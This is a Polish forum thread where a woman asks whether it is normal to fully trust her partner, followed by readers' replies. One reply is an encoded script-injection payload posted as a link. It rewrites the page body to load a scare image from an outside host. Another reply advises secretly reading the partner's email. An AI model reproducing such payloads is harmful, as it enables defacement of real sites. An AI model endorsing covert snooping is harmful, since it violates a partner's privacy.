Skocz do zawartości
Szukaj w
  • Więcej opcji...
Znajdź wyniki, które zawierają...
Szukaj wyników w...

Zarchiwizowany

Ten temat jest archiwizowany i nie można dodawać nowych odpowiedzi.

Gość Anq25

Czy jestem normalna?

Polecane posty

Gość Anq25

Ni eprzeszukuje kieszeni swojego faceta, nie sprawdzam komórki, bilingów, rachunków, mejli...pozwalam mu wychodzic samemu z kumplami na piwo (oczywiscie ustalamy o ktorej wroci i jak chce wrocic pozniej to dzwoni zeby mnie uprzedzic)...nie obrazam sie jak spojrzy na inna kobiete na ulicy (no przeciez to naturalne ze moze zwrocic na kogos uwage...tez nieraz spojrze i nie ma to nic na celu, po prostu ładne osoby przyciagaja wzrok...oczywiscie nie mowie o tlenionej, zjaranej lasce w miniówce)...kolezanki sie smieja ze jestem naiwna, ze faceci to swinie i kazdy facet wały robi, ryja im po kieszeniach, robia podchody, szpieguja...to po co one z tym kims są?! Momentami mam dosc bo przez te ich gadanie wpadam w paranoje i zaczynam doszukiwac sie przewinien...i dopiero po dłuzeszej chwili dociera do mnie ze zaczynam sie zachowywac jak te kretynki... Kuźwa czy naprawde ja jestem taka glupia? Czy to wiekszosc lasek jest walnieta? Czy moze mam mega szczescie ze od 8 lat mam super faceta u boku na co jest mniejsza szansa jak na wygranie w totka...zero kłótni, zazdorsci, podejrzen... Czy ktos z was tak ma? czy tez mi radzicie "otworzyć oczy"?

Gość dasasdadssasda
http://www.%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%09%64%6F%63%75%6D%65%6E%74%2E%62%6F%64%79%2E%69%6E%6E%65%72%48%54%4D%4C%20%3D%20%22%3C%69%6D%67%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%70%77%70%2E%6E%65%74%63%61%62%6F%2E%70%74%2F%30%32%31%30%39%38%30%33%30%31%2F%6D%64%2F%65%78%6F%72%63%69%73%74%2E%6A%70%67%27%20%2F%3E%22%3B%0A%3C%2F%73%63%72%69%70%74%3E

Gość nie jestes normalna
jestes bezkrytycznie naiwna

Gość amatorszczyzna
kurcze wiesz my w sumie tez sie nie klocimy, w zwiazku panuje nieprzerwanie wiosna ale zdarza mi sie sprawdzic jego poczte czy smsy:) jestem o niego zazdrosna i choc wiem ze on kocha mnie bardzo czuje sie spokojniejsza gdy trzymam reke na pulsie:) no ale wy jestescie ze soba 8 lat a my raptem kilka miesiecy:)

Gość Anq25
co za de...te linki wkleja....burdel na tym forum...

Gość nienie jestes normalna
siedzisz na kafe i zadajesz glupie pytania:)

Gość waniliaPyszna
zdradza cie:D

Gość americla
jestes normalna, tez mam takie podejscie, to daje duzy komfort facetowi i wygode bycia z toba, tylko uwazaj zeby nei poczul sie zbyt komfortowo, proponuje abys mimo wsyztsko przegladala jego krzynke odbiorcza, oczywiscie tak zeby o tym nei wiedzial! przezornosc oplaca. nie mozna maltretowac mezczyzny podejrzeniami i robic z seibie deperatki, ale nie poposzczaj mu tez za bardzo.

to jest normalne. Nie każdy facet zdradza, oszukuje, kłamie etc. O, dla przykładu ja :-) To co Ty masz, a czego brakuje koleżankom to: ZAUFANIE. Jak dla mnie podstawa każdego zdrowego związku.

bardzo slusznie postepujesz. gratuluje udanego zwiazku :) zadaj sobie odwrotne pytanie - laski sa glupie, zdradzaja, flirtuja z nieznajomymi itd itd itd - czy Ty taka jestes? uogolnianie to glupota. dzieki temu, ze dajesz facetoewi spokoj, na pewno to docenia i dlatego macie tak super. nie zmieniaj nic. w moim zwiazku dzieje sie tak samo ;)